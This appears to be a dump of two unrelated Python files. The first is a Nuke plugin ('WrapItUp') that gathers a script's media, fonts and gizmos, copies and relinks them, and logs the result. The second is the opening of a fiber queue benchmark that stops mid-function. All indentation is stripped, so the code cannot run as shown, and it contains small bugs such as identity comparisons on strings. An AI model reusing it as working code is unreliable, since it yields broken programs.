UpdateLabels(False)
# makes long path -> ../long path if it is too long
def shortenPath(strPath, iChars):
newPath = '...' + strPath[-iChars:]
short = False
if len(strPath) > iChars:
short = True
return newPath if short else strPath
# convert a list of nodes to a string of node names - list of nodes, underscore, item index (for data check)
def getNodeNames(nodeList, us = False, i = 0):
strNodes = ''
for eachNode in nodeList:
strNodes += (eachNode.fullName() if (i <= -5 or i >= 0) else eachNode) + ('_' if us else ' ')
strNodes = strNodes[:-1]
return strNodes
# convert a list of knobs to a string of node names - list of knobs, underscore
def getKnobNames(knobList, us = False):
strKnobs = ''
for eachKnob in knobList:
strKnobs += eachKnob + ('_' if us else ' ')
strKnobs = strKnobs[:-1]
return strKnobs
# update the labels underneath the lists
def UpdateLabels(CopyList):
# disable button
WGoToNode.setEnabled(False)
# get all selected objects
sel = []
if(CopyList):
sel = WListCopyPaths.selectedItems()
else:
sel = WListIgnorePaths.selectedItems()
if len(sel) == 1:
# get last selected object
selVal = sel[0]
# get data index
selI = selVal.data(QtCore.Qt.UserRole)
# set data
selData = []
selOtherData = []
Media = False
if selI >= 0:
Media = True
curritempath = ''
packeditempath = ''
curritemfiles = ''
curritemsize = 0
# get media data
if(Media):
selData = WIU_MediaData[selI]
curritempath = selData[3]
packeditempath = PackedPath( curritempath, nodeName=getNodeNames(selData[0], us=True), project_dir = selData[6] )
curritemfiles = str( len(selData[4]) )
curritemsize = selData[5]
WGoToNode.setToolTip( getNodeNames(selData[0], us=False) )
WGoToNode.setEnabled(True)
# project directory prefix
if(selData[6]):
curritempath = ProjectDirectory(curritempath)
# get other data
else:
# convert selI to positive integers, matching to the data array
selIConverted = abs(selI) - 1
# get data
selData = WIU_OtherData[selIConverted]
curritempath = selData[0]
packeditempath = PackedPath(curritempath, i = selI)
curritemfiles = '1'
# set amount of files for fonts
if selI == -4:
curritemfiles = str(len(selData[2]))
packeditempath = WIU_PackedPath + '/' + curritempath[:-1].split('/')[-1]
curritemsize = selData[1]
# TCL eval
curritempath = evalTCL(curritempath)
# set label texts and tooltips
labelLength = 100
# get shortened path
curritempathShortened = shortenPath(curritempath, labelLength)
# set as text
WCurrItemPath.setText(curritempathShortened)
# set full path as tooltip
WCurrItemPath.setToolTip(curritempath)
# get shortened path
packeditempathShortened = shortenPath(packeditempath, labelLength)
# set as text
WPackedItemPath.setText(packeditempathShortened)
# set full path as tooltip
WPackedItemPath.setToolTip(packeditempath)
WCurrItemFiles.setText(curritemfiles)
WCurrItemSize.setText( BytesToString(curritemsize) )
WIgnoredLabel.setVisible(not CopyList)
WGoToFolder.setEnabled(True)
else:
selectItemStr = '-'
WCurrItemPath.setText(selectItemStr)
WPackedItemPath.setText(selectItemStr)
WCurrItemFiles.setText(selectItemStr)
WCurrItemSize.setText(selectItemStr)
WIgnoredLabel.setVisible(False)
WGoToFolder.setEnabled(False)
# update the labels underneath the lists
def UpdateItemInfo(n = False, pd = False):
global WIU_ParentDirCount
global WIU_NodeNameFolder
if pd:
WIU_ParentDirCount = WParentDirectories.value()
if n:
WIU_NodeNameFolder = WNodeNameFolder.isChecked()
# check which list the currently selected item is in, and update its info
if WIgnoredLabel.isVisible():
IgnoreListSelectionChanged()
else:
CopyListSelectionChanged()
# on packed path changed
def PackedPathChanged():
# allow editing of global
global WIU_PackedPath
# update WIU_PackedPath
WIU_PackedPath = WPackedPath.text()
UpdateItemInfo()
# arguments are switches for relink and relink, relative
def RelinksInList(r = False, rr = False):
global WIU_Relink
global WIU_RelinkRelative
if not silent:
if r:
WIU_Relink = not WIU_Relink
if rr:
WIU_RelinkRelative = not WIU_RelinkRelative
# get each item
i = 0
while i < WListCopyPaths.count():
# get data
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
# delete if relink
if d == -2 or d == -3:
WListCopyPaths.takeItem(i)
i = 0
else:
i += 1
# if no UI
else:
WIU_Relink = relinked
WIU_RelinkRelative = relativerelinked
iCopyCount = 0
# add current nuke script to copy list, this time relative relinked
if WIU_RelinkRelative:
item = "nk (relative relinked)\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
index = 1
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -3)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -3])
WIU_SilentReturn.append(item)
# add current nuke script to copy list, this time relinked
if WIU_Relink:
item = "nk (relinked)\t\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
index = 1
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -2)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -2])
WIU_SilentReturn.append(item)
# for refresh function item count
return iCopyCount
# show/hide addon items in list, arguments for toggles
def AddOnsInList(f = False, g = False):
global WIU_Gizmo
global WIU_Fonts
if not silent:
if g:
WIU_Gizmo = not WIU_Gizmo
if f:
WIU_Fonts = not WIU_Fonts
# remove all addon items
i = 0
while i < WListCopyPaths.count():
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
if d <= -4:
WListCopyPaths.takeItem(i)
i = 0
else:
i += 1
# if no UI is loaded
else:
WIU_Gizmo = gizmos
WIU_Fonts = fonts
iCopyCount = 0
# determine index of items
index = 1
if not silent:
if WRelativeRelink.isChecked():
index += 1
if WRelinkPaths.isChecked():
index += 1
if WIU_Gizmo:
# iterate through all items in WIU_OtherData, except for the first 4 (0 - 3, which are nuke script, - relinked, - relinked relative, font)
for eachGizmo in range(len(WIU_OtherData) - 4):
item = "gizmo\t\t" + WIU_OtherData[4 + eachGizmo][0] if not silent else "gizmo\t\t\t" + WIU_OtherData[4 + eachGizmo][0]
if not silent:
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -5 - eachGizmo)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -5 - eachGizmo])
WIU_SilentReturn.append(item)
FontPathExists = os.path.isdir(WIU_OtherData[3][0])
if WIU_Fonts and FontPathExists:
item = "font folder\t\t" + WIU_OtherData[3][0] if not silent else "font folder\t\t\t" + WIU_OtherData[3][0]
if not silent:
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -4)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -4])
WIU_SilentReturn.append(item)
# for refresh function item count
return iCopyCount
def ChoosePackedPath():
# open nuke file dialog
chosenPath = nuke.getFilename('WrapItUp - choose the folder to copy the script and all media to')
if chosenPath is not None:
# make sure it is an existing folder
if os.path.isfile(chosenPath):
chosenPath = os.path.dirname(chosenPath)
# cut off the last / if it is there
if chosenPath.endswith('/'):
chosenPath = chosenPath[:-1]
# set value to text knob
if os.path.isdir(chosenPath):
# set packed path
WPackedPath.setText(chosenPath)
# path does not exist, ask to create the folders instead
else:
q = nuke.ask('Path does not exist:\n\n' + chosenPath + '\n\nDo you want to choose this path anyway? Any non-existing folders will be created when files are copied.')
if q:
if chosenPath.endswith('/'):
chosenPath = chosenPath[:-1]
WPackedPath.setText(chosenPath)
# regain focus on form
window.activateWindow()
# function to control buttons on form
def ButtonsAllowed(YesOrNo):
# disable all buttons that could interfere (except for the interrupt button of course)
WSendToCopy.setEnabled(YesOrNo)
WSendToIgnore.setEnabled(YesOrNo)
WStart.setEnabled(YesOrNo)
WRefresh.setEnabled(YesOrNo)
WParentDirectories.setEnabled(YesOrNo)
WRelinkPaths.setEnabled(YesOrNo)
WRelativeRelink.setEnabled(YesOrNo)
WNodeNameFolder.setEnabled(YesOrNo)
WPackedPath.setEnabled(YesOrNo)
WChoosePackedPathButton.setEnabled(YesOrNo)
WLParentDirectories.setEnabled(YesOrNo)
WLPath.setEnabled(YesOrNo)
WContinueOnError.setEnabled(YesOrNo)
WCSVSeparator.setEnabled(YesOrNo)
WLCSVSeparator.setEnabled(YesOrNo)
WLicense.setEnabled(YesOrNo)
WLLicense.setEnabled(YesOrNo)
WExitOnFinish.setEnabled(YesOrNo)
WCopyFontDir.setEnabled(YesOrNo)
WCopyGizmos.setEnabled(YesOrNo)
# make progress bar visible
WTotalProgress.setVisible(not YesOrNo)
WItemProgress.setVisible(not YesOrNo)
WCurrentCopyItem.setVisible(not YesOrNo)
# prepare list to copy
def PrepareCopy():
global WIU_TotalSize
global WIU_SilentList
global WIU_MediaDataNotIgnored
# bool for ProcessFiles
relinkFonts = False
# get all items in data list
itemsToCopy = []
listLen = WListCopyPaths.count() if not silent else len(WIU_SilentList)
for i in range(listLen):
# get index
dataItem = 0
if not silent:
dataItem = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
else:
dataItem = WIU_SilentList[i][1]
# assign custom data for nuke script to item
# make list with item index and data combined, so the index does not get lost
if(dataItem < 0):
itemsToCopy.append( [dataItem, WIU_OtherData[abs(dataItem) - 1]] )
# all other media files
else:
itemsToCopy.append( [dataItem, WIU_MediaData[dataItem]] )
# store this index for relinking only relevant media
WIU_MediaDataNotIgnored.append(WIU_MediaData[dataItem])
# get all files involved
fileList = []
i = 0
addedSizes = 0.0
for j in itemsToCopy:
# index, data
k = j[0]
l = j[1]
# media
if k >= 0 and media:
# item size
itemSizeCounting = 0
# get list of each file, file size
for eachFileS in l[4]:
# get path of destination file path
eachFileTo = PackedPath(eachFileS[0], nodeName = getNodeNames(l[0], us = True), project_dir = l[6])
# count sizes together
itemSizeCounting += eachFileS[1]
# single files of 0 bytes should still be copied (even though it does not make sense to have them in your script), make them 1 byte for progress bar
currSize = l[5] if int(l[5]) > 0 else 1
# get ratio for progress bar %
sequenceSizeRatio = int (float(itemSizeCounting) / float(currSize) * 100)
# set file, file path to copy to, list item index, file size in bytes, size ratio within sequence for progress bar, nodes, knobs, original index
fileList.append([ eachFileS[0], eachFileTo, i, eachFileS[1], sequenceSizeRatio, l[0], l[1], k ])
# nuke script
if k == -1:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# nuke script relinked
if k == -2:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# nuke script relinked relative
if k == -3:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# font directory
if k == -4:
# set bool
relinkFonts = True
# item size
itemSizeCounting = 0
# get each font, size combination
for eachFileS in l[2]:
# get path of destination file path
if l[0].endswith('/'):
l[0] = l[0][:-1]
eachFileTo = PackedPath(eachFileS[0], i = k, fontFolder = l[0])
# count sizes together
itemSizeCounting += eachFileS[1]
# progress bar value (l[1] if not 0, else 1)
maxVal = float(l[1] * 100)
maxVal = 1 if maxVal == 0 else maxVal
sequenceSizeRatio = int ( float(itemSizeCounting) / (maxVal) )
# set file, file path to copy to, list item index, file size in bytes, size ratio within sequence for progress bar, nodes, knobs, original index
fileList.append( [eachFileS[0], eachFileTo, i, eachFileS[1], sequenceSizeRatio, ['root'], ['free_type_font_path'], k] )
# gizmo
if k <= -5:
filePath = l[0]
fileSize = l[1]
nodes = l[2]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, nodes, ['-'], k ])
# count
i += 1
return [fileList, relinkFonts]
# function to append text to log file
def WriteLog(logText, first = False):
# which file
filePath = WIU_PackedPath + '/log.csv'
# try to remove it if logging just started
if first:
try:
os.remove(filePath)
except Exception as e:
pass
try:
# open file
f = open(filePath, "a+")
# write and close
f.write(logText + '\n')
f.close()
except Exception as e:
pass
# convert data to CSV format
def CSV(values):
CSVtext = ''
csv = WCSVSeparator.currentText() if not silent else (',' if csvcommas else ';')
for d in values:
CSVtext += '\"' + str(d) + '\"' + (csv)
return CSVtext
def getLic():
license = WLicense.currentText() if not silent else ('-ti' if licinteractive else '-t')
return license
# threaded function for copying/relinking - list of files to process with all necessary data, fonts should be relinked (bool)
def ThreadedCopy(fileList, relinkFonts):
# error count
totalErrorCount = 0
# count size
totalSizeCount = 0
totalSizeStored = WIU_TotalSize
listCount = (WListCopyPaths.count() if not silent else len(WIU_SilentList)) - 1
# write first lines of log
nukever = str(nuke.NUKE_VERSION_STRING)
nukescript = nuke.root().name() if not silent else nk
params = CSV(["Used command-line/python function", str(silent)]) + '\n' + CSV(["Script path", nukescript]) + '\n' + CSV(["Folders with node names", str(WIU_NodeNameFolder)]) + '\n' + CSV(["Parent directory count", str(WIU_ParentDirCount)]) + '\n' + CSV(["Relinked", str(WIU_Relink)]) + '\n' + CSV(["Relative relinked", str(WIU_RelinkRelative)]) + '\n' + CSV(["Fonts", str(WIU_Fonts)]) + '\n' + CSV(["Gizmos", str(WIU_Gizmo)]) + '\n' + CSV(["License", 'nuke_i' if getLic() == '-ti' else 'nuke_r'])
WriteLog( WIU_Title + '\n' + 'Nuke version: ' + nukever + '\n\n' + params + '\n\n\n' + CSV(['TIME', 'STATUS', 'FILE (FROM)', 'FILE (TO)', 'NODE', 'KNOB', 'SIZE', 'RETURN']) + '\n', first = True )
# copy files
prevI = -1
firstInit = True
i = 0
iM = len(fileList)
c = False
lastItemFailed = False
for f in fileList:
# get current time
timestr = time.strftime("%c")
# interrupt check
if WIU_Interrupted:
WriteLog( CSV([timestr, 'PROCESS WAS CANCELLED BY USER']) )
nuke.executeInMainThread(Finished, args=('USER'))
sys.exit()
relinkMethod = 0 if f[7] == -2 else (1 if f[7] == -3 else -1) # 0 if relink, 1 if relink relative, -1 if none
suffix = ' copy/relink' if relinkMethod is not -1 else '' # suffix for relinked nk scripts
labelText = shortenPath(f[0] + suffix, 20) # get shorter path for current copying file, add suffix
if not silent:
# set label text
nuke.executeInMainThread(SetCurrCopyItemLabel, args=(labelText, f[0]))
# set working colour
nuke.executeInMainThread(ChangeItemColour, args = (f[2], True))
else:
# append size to label text for console
labelText += ' (' + BytesToString(f[3]) + ')'
# start process
writeInit = f[7] <= -5 # True if in gizmo range of list
result = ProcessFile(f[0], f[1], writeInit, firstInit, relinkMethod, relinkFonts)
if writeInit:
firstInit = False
# add to size count
totalSizeCount += f[3]
# write log
if result == '':
WriteLog( CSV([timestr, 'SUCCES', f[0], f[1], getNodeNames(f[5], i=f[7]), getKnobNames(f[6]), BytesToString(f[3])]) )
# make green
if(f[2] > prevI):
if not silent:
if not lastItemFailed:
nuke.executeInMainThread(ChangeItemColour, args = (prevI, False, True))
nuke.executeInMainThread(ChangeItemColour, args = (f[2], False, True))
lastItemFailed = False
prevI = f[2]
# on error
else:
WriteLog( CSV([timestr, 'FAILED', f[0], f[1], getNodeNames(f[5], i=f[7]), getKnobNames(f[6]), BytesToString(f[3]), result]) )
if not silent:
if not WContinueOnError.isChecked():
nuke.executeInMainThread(Finished, args = ([f[0] + '\n\n' + result]))
# make red
if(f[2] > prevI):
nuke.executeInMainThread(ChangeItemColour, args = (f[2], False, False))
lastItemFailed = True
prevI = f[2]
totalErrorCount += 1
# set total progress bar
sizeRatio = float( totalSizeCount ) / float( totalSizeStored )
progressVal = int( sizeRatio * 100 )
# set item progress bar
if not silent:
nuke.executeInMainThread(ItemProgressUpdate, args = (f[4]))
nuke.executeInMainThread(TotalProgressUpdate, args = (progressVal))
# print progress
else:
if not (f[7] <= -1 and f[7] >= -3):
if not c:
c = True
print('')
if i == iM - 1:
labelText = ' '
sys.stdout.write(WIU_Log + "Copying files: %d%% \t %s \r" % (progressVal, labelText) )
sys.stdout.flush()
i += 1
WriteLog( CSV([timestr, 'FINISHED!']) )
if not silent:
nuke.executeInMainThread(Finished, args = ('' if totalErrorCount == 0 else '.'))
else:
print('\n\n\n' + WIU_Log + (('Finished! No errors. Out folder path:\n' + WIU_Log + out) if totalErrorCount == 0 else 'Finished copying! There were some errors. Check the log in the out folder:\n' + WIU_Log + out))
# set current copy item texts
def SetCurrCopyItemLabel(strText, strToolTip):
WCurrentCopyItem.setText(strText)
WCurrentCopyItem.setToolTip(strToolTip)
# total progress bar update on main thread
def TotalProgressUpdate(NewValue):
WTotalProgress.setValue(NewValue)
# item progress bar update on main thread
def ItemProgressUpdate(NewValue):
WItemProgress.setValue(NewValue)
# progress bar update on main thread
def ChangeItemColour(i, loading, Succeeded=False):
C = []
if Succeeded:
C = [0, 255, 0]
else:
if loading:
C = [255, 215, 0]
else:
C = [255, 0, 0]
# 'disabled' colour
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
if d < 0 and not loading:
C = [round(C[0]*.5), round(C[1]*.5), round(C[2]*.5)]
WListCopyPaths.item(i).setForeground(QtGui.QColor(C[0], C[1], C[2]))
# function to call on finish
def Finished(isError):
global WIU_Interrupted
global WIU_Copying
WIU_Interrupted = False
WIU_Copying = False
# exit window when not interrupted by user and exit on finish is enabled
if ((isError is not 'USER') and (WExitOnFinish.isChecked())):
# do not ask to save script
try:
nuke.toNode('root').setModified(False)
except Exception as e:
pass
# exit
nuke.scriptExit()
else:
if(isError == ''):
window.close()
nuke.message("Finished copying! There were no errors.\nThe folder will open now.")
OpenFolder(WIU_PackedPath)
elif(isError == '.'):
window.close()
nuke.message("Finished copying! There were some errors.\nThe folder will open now, see the log file for details!")
OpenFolder(WIU_PackedPath)
elif(isError == 'USER'):
nuke.message("Copying cancelled! The folder will open now.")
window.activateWindow()
OpenFolder(WIU_PackedPath)
WInterrupt.setEnabled(True)
ButtonsAllowed(True)
Refresh()
else:
nuke.message("ERROR: " + isError + '\n\nSee ./log.txt for more information.')
WInterrupt.setEnabled(True)
ButtonsAllowed(True)
window.activateWindow()
OpenFolder(WIU_PackedPath)
Refresh()
# open folder
def OpenFolder(folderPath = ''):
if folderPath == '':
folderPath = WCurrItemPath.toolTip()
oFolderPath = folderPath
try:
# get parent dir
if not os.path.isdir(folderPath):
folderPath = os.path.dirname(folderPath)
# get project directory folder
if not os.path.isdir(folderPath):
folderPath = ProjectDirectory(oFolderPath)
if os.path.isdir(folderPath):
if sys.platform == 'win32':
folderPath = folderPath.replace('/', '\\')
os.startfile(folderPath)
else:
opener ="open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, folderPath])
else:
print(folderPath)
except Exception as e:
pass
def ToNode():
# select the nodes
for i in nuke.allNodes():
try:
i.setSelected(False)
except Exception as e:
pass
for eachNode in WGoToNode.toolTip().split(' '):
n = nuke.toNode(eachNode)
try:
n.setSelected(True)
except Exception as e:
pass
# zoom
nuke.zoomToFitSelected()
# start copy
def StartCopy():
global WIU_Copying
global WIU_PackedPath
# check
q = True
if not silent:
q = nuke.ask("Start copying " + WTotalCopySize.text() + '?\n' + 'Destination: ' + WIU_PackedPath + '\nAny existing files will be overwritten.')
window.activateWindow()
# set out folder
else:
WIU_PackedPath = out
if q:
# disable ui
if not silent:
ButtonsAllowed(False)
# get list to copy
preparedCopy = PrepareCopy()
fileList = preparedCopy[0]
relinkFonts = preparedCopy[1]
if not silent:
# run process on different thread
threading.Thread(target=ThreadedCopy, args=([fileList, relinkFonts])).start()
else:
# run threaded copy on main thread in terminal
ThreadedCopy(fileList, relinkFonts)
WIU_Copying = True
if silent:
return WIU_SilentReturn
# interrupt
def StopCopy():
global WIU_Interrupted
global WIU_Copying
# check
if WIU_Copying:
question = "Are you sure you want to cancel?"
q = nuke.ask(question)
window.activateWindow()
if q:
WCurrentCopyItem.setText("<font color='red'>Cancelling...</font>")
WCurrentCopyItem.setToolTip('Waiting for the current file copy to complete before stopping the copy process.')
WIU_Interrupted = True
WInterrupt.setEnabled(False)
else:
window.close()
# open root folder
def GoToRootFolder():
if not WIU_PackedPath == '':
OpenFolder(WIU_PackedPath)
# catch window closing if the rejected button was not pressed
def exitForm():
if WIU_Copying:
window.show()
# show ui if not silent mode
if not silent:
window = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(window)
# define widgets
WLPath = window.findChild(QtWidgets.QLabel, "LPath")
WPackedPath = window.findChild(QtWidgets.QLineEdit, "PackedPath")
WGoToRootFolder = window.findChild(QtWidgets.QPushButton, "GoToRootFolder")
WChoosePackedPathButton = window.findChild(QtWidgets.QPushButton, "ChoosePackedPathButton")
WSendToIgnore = window.findChild(QtWidgets.QPushButton, "SendToIgnore")
WSendToCopy = window.findChild(QtWidgets.QPushButton, "SendToCopy")
WRefresh = window.findChild(QtWidgets.QPushButton, "Refresh")
WGoToFolder = window.findChild(QtWidgets.QPushButton, "GoToFolder")
WGoToNode = window.findChild(QtWidgets.QPushButton, "GoToNode")
WListCopyPaths = window.findChild(QtWidgets.QListWidget, "ListCopyPaths")
WListIgnorePaths = window.findChild(QtWidgets.QListWidget, "ListIgnorePaths")
WRelinkPaths = window.findChild(QtWidgets.QCheckBox, "RelinkPaths")
WRelativeRelink = window.findChild(QtWidgets.QCheckBox, "RelativeRelink")
WNodeNameFolder = window.findChild(QtWidgets.QCheckBox, "NodeNameFolder")
WParentDirectories = window.findChild(QtWidgets.QSpinBox, "ParentDirectories")
WLParentDirectories = window.findChild(QtWidgets.QLabel, "LParentDirectories")
WCopyFontDir = window.findChild(QtWidgets.QCheckBox, "CopyFontDir")
WCopyGizmos = window.findChild(QtWidgets.QCheckBox, "CopyGizmos")
WContinueOnError = window.findChild(QtWidgets.QCheckBox, "ContinueOnError")
WExitOnFinish = window.findChild(QtWidgets.QCheckBox, "ExitOnFinish")
WCSVSeparator = window.findChild(QtWidgets.QComboBox, "CSVSeparator")
WLCSVSeparator = window.findChild(QtWidgets.QLabel, "LCSVSeparator")
WLicense = window.findChild(QtWidgets.QComboBox, "License")
WLLicense = window.findChild(QtWidgets.QLabel, "LLicense")
WIgnoredLabel = window.findChild(QtWidgets.QLabel, "IgnoredLabel")
WCurrItemPath = window.findChild(QtWidgets.QLabel, "CurrItemPath")
WPackedItemPath = window.findChild(QtWidgets.QLabel, "PackedItemPath")
WCurrItemFiles = window.findChild(QtWidgets.QLabel, "CurrItemFiles")
WCurrItemSize = window.findChild(QtWidgets.QLabel, "CurrItemSize")
WCurrentCopyItem = window.findChild(QtWidgets.QLabel, "CurrentCopyItem")
WTotalProgress = window.findChild(QtWidgets.QProgressBar, "TotalProgress")
WItemProgress = window.findChild(QtWidgets.QProgressBar, "ItemProgress")
WTotalCopySize = window.findChild(QtWidgets.QLabel, "TotalCopySize")
WStart = window.findChild(QtWidgets.QPushButton, "Start")
WInterrupt = window.findChild(QtWidgets.QPushButton, "Interrupt")
WLWebsite = window.findChild(QtWidgets.QLabel, "LWebsite")
# connect widgets to functions
WPackedPath.textChanged.connect(lambda:PackedPathChanged())
WGoToRootFolder.clicked.connect(lambda:GoToRootFolder())
WChoosePackedPathButton.clicked.connect(lambda:ChoosePackedPath())
WSendToIgnore.clicked.connect(lambda:SendToIgnore())
WSendToCopy.clicked.connect(lambda:SendToCopy())
WRefresh.clicked.connect(lambda:Refresh())
WGoToFolder.clicked.connect(lambda:OpenFolder())
WGoToNode.clicked.connect(lambda:ToNode())
WListCopyPaths.itemSelectionChanged.connect(lambda:CopyListSelectionChanged())
WListIgnorePaths.itemSelectionChanged.connect(lambda:IgnoreListSelectionChanged())
WRelinkPaths.stateChanged.connect(lambda:RelinksInList(r = True))
WRelativeRelink.stateChanged.connect(lambda:RelinksInList(rr = True))
WNodeNameFolder.stateChanged.connect(lambda:UpdateItemInfo(n = True))
WParentDirectories.valueChanged.connect(lambda:UpdateItemInfo(pd = True))
WCopyFontDir.stateChanged.connect(lambda:AddOnsInList(f = True))
WCopyGizmos.stateChanged.connect(lambda:AddOnsInList(g = True))
WStart.clicked.connect(lambda:StartCopy())
WInterrupt.clicked.connect(lambda:StopCopy())
# disable esc
window.rejected.connect(lambda:exitForm())
# disable window resizing
window.setFixedSize(window.size())
# hide ui elements, set enable/disable state
ButtonsAllowed(True)
WIgnoredLabel.setVisible(False)
# show the UI window
window.show()
# read comp data
Refresh()
else:
# open chosen nuke script
nuke.scriptOpen(nk)
# non-threaded version of same function
data = RefreshThreaded()
return data
# python function start
def WrapItUp(fromterminal = False, nk = '', startnow = False, out = '', nodenamefolder = True, parentdircount = 3, relinked = True, relativerelinked = True, media = True, fonts = True, gizmos = True, csvcommas = False, licinteractive = False):
global WIU_AppPath
# set nuke app path if not running from terminal
if not fromterminal:
WIU_AppPath = nuke.EXE_PATH
# if run from python function or terminal
if out is not '':
# empty line
print('')
# starting line
if fromterminal:
print('\n' + WIU_Log + 'Running from terminal (no UI)...')
else:
print('\n' + WIU_Log + 'Running from Python function (no UI)...')
# set to current nuke script if no custom one has been defined
if nk == '':
nk = nuke.scriptName()
nk = nk.replace('\\', '/')
# error bool
err = False
# check if out path exists, convert to backslashes
out = out.replace('\\', '/')
if not os.path.isdir(out):
err = True
print(WIU_Log + 'ERROR: Folder does not exist: ' + out)
if not os.path.isfile(nk):
err = True
print(WIU_Log + 'ERROR: Nuke script does not exist: ' + nk)
# check if parent directory count is a valid number
if parentdircount < 1 or parentdircount > 99:
err = True
print(WIU_Log + 'ERROR: directory count (' + str(parentdircount) + ') should be in range 1-99!')
# silent mode
silent = True
# exit on error
if err:
return
# start
else:
# param list
p = [['Nuke script\t', nk],
['Output path\t', out],
['Node name folders', nodenamefolder],
['Parent dir count', parentdircount],
['Relink\t', relinked],
['Relink relative', relativerelinked],
['media\t', media],
['Fonts\t', fonts],
['Gizmo files\t', gizmos],
['CSV commas\t', csvcommas],
['Interactive license', licinteractive]]
# param string
param = '\n' + WIU_Log + 'Selected parameters'
for i in p:
param += '\n' + WIU_Log + i[0] + '\t\t' + str(i[1])
print(param)
# only print preview
returnedFiles = _Start(silent, nk, False, out, nodenamefolder, parentdircount, relinked, relativerelinked, media, fonts, gizmos, csvcommas, licinteractive)
returnedStr = ''
for i in returnedFiles:
returnedStr += '\n' + WIU_Log + str(i)
print('\n' + WIU_Log + 'Found files (' + BytesToString(WIU_TotalSize) + '):\n' + returnedStr + '\n')
# if starting right away
if startnow:
# start
print('\n' + WIU_Log + 'Starting...' + '\n')
# begin
_Start(silent, nk, startnow, out, nodenamefolder, parentdircount, relinked, relativerelinked, media, fonts, gizmos, csvcommas, licinteractive)
# if running with UI in Nuke
if out == '' and not fromterminal:
# starting in UI mode w/o parameters
_Start()
# autostart (if not imported)
if __name__ == "__main__":
# get all args
c = nuke.rawArgs
# check if running from terminal
t = False
ti = False
try:
t = '-t' in c
ti = '-i' in c
except Exception as e:
pass
# start with terminal commands
if t or ti:
# error bool
err = False
# get path
WIU_AppPath = c[0]
# nukescript
aNK = ''
for index, arg in enumerate(c):
if arg in ['-nk'] and len(c) > index + 1:
aNK = c[index + 1]
del c[index]
del c[index]
break
# destination path
aOut = ''
for index, arg in enumerate(c):
if arg in ['-o'] and len(c) > index + 1:
aOut = c[index + 1]
del c[index]
del c[index]
break
# start (instead of only returning a to-do list)
aStart = False
for index, arg in enumerate(c):
if arg in ['-s']:
aStart = True
del c[index]
break
# node name directory
aNodeName = True
for index, arg in enumerate(c):
if arg in ['-n']:
aNodeName = False
del c[index]
break
# parent directory count
aDirCount = 3
for index, arg in enumerate(c):
if arg in ['-pd']:
try:
aDirCount = int(c[index + 1])
except Exception as e:
err = True
print(WIU_Log + 'Non-numerical value entered for -pd.')
del c[index]
del c[index]
break
# relinked
aReli = True
for index, arg in enumerate(c):
if arg in ['-r']:
aReli = False
del c[index]
break
# relinked relative
aReliRela = True
for index, arg in enumerate(c):
if arg in ['-rr']:
aReliRela = False
del c[index]
break
# media
aMedia = True
for index, arg in enumerate(c):
if arg in ['-m']:
aMedia = False
del c[index]
break
# fonts
aFonts = True
for index, arg in enumerate(c):
if arg in ['-f']:
aFonts = False
del c[index]
break
# gizmos
aGizmos = True
for index, arg in enumerate(c):
if arg in ['-g']:
aGizmos = False
del c[index]
break
# csv commas
aCSV = False
for index, arg in enumerate(c):
if arg in ['-csvcommas']:
aCSV = True
del c[index]
break
# use same license
aLicInteractive = ti
# error handling
if err:
print(WIU_Log + 'Usage:\n-nk <nukescript path> (required)\n-o <output folder> (required)\n-s (start now - if not, only a preview list of the files to be processed will be returned)\n-n (disable: place media in node name folder)\n-pd <parent directory count> (default: 3)\n-r (disable: make relinked .nk)\n-rr (disable: make relative relinked .nk)\n-m (disable: collect media)\n-f (disable: collect font folder)\n-g (disable: collect gizmos)\n-csvcomma (use commas instead of semicolons as the CSV separator)')
else:
WrapItUp(fromterminal = True, nk = aNK, startnow = aStart, out = aOut, nodenamefolder = aNodeName, parentdircount = aDirCount, relinked = aReli, relativerelinked = aReliRela, media = aMedia, fonts = aFonts, gizmos = aGizmos, csvcommas = aCSV, licinteractive = aLicInteractive)
else:
WrapItUp()
|
bench_queue.py
|
import sys
import time
import fiber
import multiprocessing as mp
from threading import Thread
from fiber import SimpleQueue as Queue
from datetime import datetime
import logging
import time
import random
logger = logging.getLogger('fiber')
logger.setLevel(logging.DEBUG)
NUM = int(1e6)
MSG = "MESSAGE_"# * 1024
def worker(recv_q, send_q):
every = NUM / 10
for task_nbr in range(NUM):
send_q.put(MSG + str(task_nbr))
if task_nbr % every == 0:
print("worker put", task_nbr, MSG)
print("before worker got")
msg = recv_q.get()
print("worker got", msg)
sys.exit(1)
def single_queue_mp_write(mplib):
"""Single queue, get in master process and put in worker process."""
every = NUM / 10
send_q = mplib.SimpleQueue()
recv_q = mplib.SimpleQueue()
mplib.Process(target=worker, daemon=True, args=(send_q, recv_q)).start()
for num in range(NUM):
msg = recv_q.get()
if num % every == 0:
print("master got", num, msg)
send_q.put(None)
print("master put", None)
def single_queue_sync_rw(mplib):
